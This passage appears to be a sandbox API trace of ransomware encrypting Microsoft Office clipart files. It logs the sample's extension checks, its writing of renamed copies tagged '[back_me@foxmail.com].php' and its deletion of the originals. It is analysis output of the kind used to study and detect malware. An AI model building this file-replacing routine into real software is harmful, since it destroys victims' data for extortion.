[0264.240] lstrlenW (lpString=".doc") returned 4 [0264.240] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.240] lstrlenW (lpString=".docx") returned 5 [0264.240] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0264.240] lstrlenW (lpString=".pdf") returned 4 [0264.240] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.240] lstrlenW (lpString=".xls") returned 4 [0264.240] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.240] lstrlenW (lpString=".xlsx") returned 5 [0264.240] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0264.240] lstrlenW (lpString=".ppt") returned 4 [0264.240] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.240] lstrlenW (lpString=".zip") returned 4 [0264.240] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.240] lstrlenW (lpString=".rar") returned 4 [0264.240] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.240] lstrlenW (lpString=".bz2") returned 4 [0264.240] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.240] lstrlenW (lpString=".7z") returned 3 [0264.240] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.240] lstrlenW (lpString=".dbf") returned 4 [0264.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.241] lstrlenW (lpString=".1cd") returned 4 [0264.241] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.241] lstrlenW (lpString=".jpg") returned 4 [0264.241] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.241] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.241] lstrlenW (lpString="J0153518.WMF") returned 12 [0264.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.241] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=12528) returned 1 [0264.241] CloseHandle (hObject=0x3b4) returned 1 [0264.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf")) returned 0x20 [0264.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.242] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.242] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.242] GetLastError () returned 0x0 [0264.242] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x30f0, lpOverlapped=0x0) returned 1 [0264.244] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x3100, lpOverlapped=0x0) returned 1 [0264.245] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.245] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.245] SetEndOfFile (hFile=0x318) returned 1 [0264.245] CloseHandle (hObject=0x318) returned 1 [0264.245] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.245] SetEndOfFile (hFile=0x3b4) returned 1 [0264.248] CloseHandle (hObject=0x3b4) returned 1 [0264.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.248] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf")) returned 1 [0264.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.248] lstrlenW (lpString=".doc") returned 4 [0264.248] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.248] lstrlenW (lpString=".docx") returned 5 [0264.248] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0264.248] lstrlenW (lpString=".pdf") returned 4 [0264.248] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.248] lstrlenW (lpString=".xls") returned 4 [0264.248] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.248] lstrlenW (lpString=".xlsx") returned 5 [0264.248] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0264.248] lstrlenW (lpString=".ppt") returned 4 [0264.249] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.249] lstrlenW (lpString=".zip") returned 4 [0264.249] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.249] lstrlenW (lpString=".rar") returned 4 [0264.249] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.249] lstrlenW (lpString=".bz2") returned 4 [0264.249] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.249] lstrlenW (lpString=".7z") returned 3 [0264.249] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.249] lstrlenW (lpString=".dbf") returned 4 [0264.249] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.249] lstrlenW (lpString=".1cd") returned 4 [0264.249] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.249] lstrlenW (lpString=".jpg") returned 4 [0264.249] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.249] lstrlenW (lpString=".doc") returned 4 [0264.249] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.249] lstrlenW (lpString=".docx") returned 5 [0264.249] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0264.249] lstrlenW (lpString=".pdf") returned 4 [0264.250] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.250] lstrlenW (lpString=".xls") returned 4 [0264.250] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.250] lstrlenW (lpString=".xlsx") returned 5 [0264.250] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0264.250] lstrlenW (lpString=".ppt") returned 4 [0264.250] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.250] lstrlenW (lpString=".zip") returned 4 [0264.250] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.250] lstrlenW (lpString=".rar") returned 4 [0264.250] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.250] lstrlenW (lpString=".bz2") returned 4 [0264.250] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.250] lstrlenW (lpString=".7z") returned 3 [0264.250] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.250] lstrlenW (lpString=".dbf") returned 4 [0264.250] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.250] lstrlenW (lpString=".1cd") returned 4 [0264.250] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63 [0264.250] lstrlenW (lpString=".jpg") returned 4 [0264.250] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.250] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.250] lstrlenW (lpString="J0156537.WMF") returned 12 [0264.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.251] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=1376) returned 1 [0264.251] CloseHandle (hObject=0x3b4) returned 1 [0264.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf")) returned 0x20 [0264.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.252] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.252] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.253] GetLastError () returned 0x0 [0264.253] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x560, lpOverlapped=0x0) returned 1 [0264.254] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x570, lpOverlapped=0x0) returned 1 [0264.255] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.255] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.255] SetEndOfFile (hFile=0x318) returned 1 [0264.255] CloseHandle (hObject=0x318) returned 1 [0264.256] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.256] SetEndOfFile (hFile=0x3b4) returned 1 [0264.257] CloseHandle (hObject=0x3b4) returned 1 [0264.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.258] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf")) returned 1 [0264.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.258] lstrlenW (lpString=".doc") returned 4 [0264.258] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.258] lstrlenW (lpString=".docx") returned 5 [0264.258] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0264.258] lstrlenW (lpString=".pdf") returned 4 [0264.258] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.258] lstrlenW (lpString=".xls") returned 4 [0264.258] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.258] lstrlenW (lpString=".xlsx") returned 5 [0264.258] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0264.258] lstrlenW (lpString=".ppt") returned 4 [0264.258] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.258] lstrlenW (lpString=".zip") returned 4 [0264.258] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.258] lstrlenW (lpString=".rar") returned 4 [0264.258] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.258] lstrlenW (lpString=".bz2") returned 4 [0264.258] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.258] lstrlenW (lpString=".7z") returned 3 [0264.259] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.259] lstrlenW (lpString=".dbf") returned 4 [0264.259] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.259] lstrlenW (lpString=".1cd") returned 4 [0264.259] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.259] lstrlenW (lpString=".jpg") returned 4 [0264.259] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.259] lstrlenW (lpString=".doc") returned 4 [0264.259] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.259] lstrlenW (lpString=".docx") returned 5 [0264.259] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0264.259] lstrlenW (lpString=".pdf") returned 4 [0264.259] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.259] lstrlenW (lpString=".xls") returned 4 [0264.259] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.259] lstrlenW (lpString=".xlsx") returned 5 [0264.259] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0264.259] lstrlenW (lpString=".ppt") returned 4 [0264.259] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.259] lstrlenW (lpString=".zip") returned 4 [0264.259] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.259] lstrlenW (lpString=".rar") returned 4 [0264.259] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.259] lstrlenW (lpString=".bz2") returned 4 [0264.259] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.259] lstrlenW (lpString=".7z") returned 3 [0264.259] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.260] lstrlenW (lpString=".dbf") returned 4 [0264.260] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.260] lstrlenW (lpString=".1cd") returned 4 [0264.260] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63 [0264.260] lstrlenW (lpString=".jpg") returned 4 [0264.260] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.260] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.260] lstrlenW (lpString="J0157167.WMF") returned 12 [0264.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0264.819] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=46702) returned 1 [0264.819] CloseHandle (hObject=0x3e8) returned 1 [0264.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf")) returned 0x20 [0264.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0264.822] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.822] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0264.822] GetLastError () returned 0x0 [0264.822] ReadFile (in: hFile=0x354, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0xb66e, lpOverlapped=0x0) returned 1 [0264.830] WriteFile (in: hFile=0x3e4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xb670, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xb670, lpOverlapped=0x0) returned 1 [0264.831] ReadFile (in: hFile=0x354, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.831] WriteFile (in: hFile=0x3e4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.832] SetEndOfFile (hFile=0x3e4) returned 1 [0264.832] CloseHandle (hObject=0x3e4) returned 1 [0264.832] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.832] SetEndOfFile (hFile=0x354) returned 1 [0264.834] CloseHandle (hObject=0x354) returned 1 [0264.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.834] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf")) returned 1 [0264.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.835] lstrlenW (lpString=".doc") returned 4 [0264.835] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.835] lstrlenW (lpString=".docx") returned 5 [0264.835] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0264.835] lstrlenW (lpString=".pdf") returned 4 [0264.835] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.835] lstrlenW (lpString=".xls") returned 4 [0264.835] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.835] lstrlenW (lpString=".xlsx") returned 5 [0264.835] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0264.835] lstrlenW (lpString=".ppt") returned 4 [0264.835] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.835] lstrlenW (lpString=".zip") returned 4 [0264.835] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.835] lstrlenW (lpString=".rar") returned 4 [0264.835] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.835] lstrlenW (lpString=".bz2") returned 4 [0264.835] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.835] lstrlenW (lpString=".7z") returned 3 [0264.835] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.835] lstrlenW (lpString=".dbf") returned 4 [0264.835] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.835] lstrlenW (lpString=".1cd") returned 4 [0264.835] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.835] lstrlenW (lpString=".jpg") returned 4 [0264.835] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.836] lstrlenW (lpString=".doc") returned 4 [0264.836] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.836] lstrlenW (lpString=".docx") returned 5 [0264.836] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0264.836] lstrlenW (lpString=".pdf") returned 4 [0264.836] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.836] lstrlenW (lpString=".xls") returned 4 [0264.836] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.836] lstrlenW (lpString=".xlsx") returned 5 [0264.836] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0264.836] lstrlenW (lpString=".ppt") returned 4 [0264.836] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.836] lstrlenW (lpString=".zip") returned 4 [0264.836] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.836] lstrlenW (lpString=".rar") returned 4 [0264.836] lstrcmpiW (lpString1=".rar", 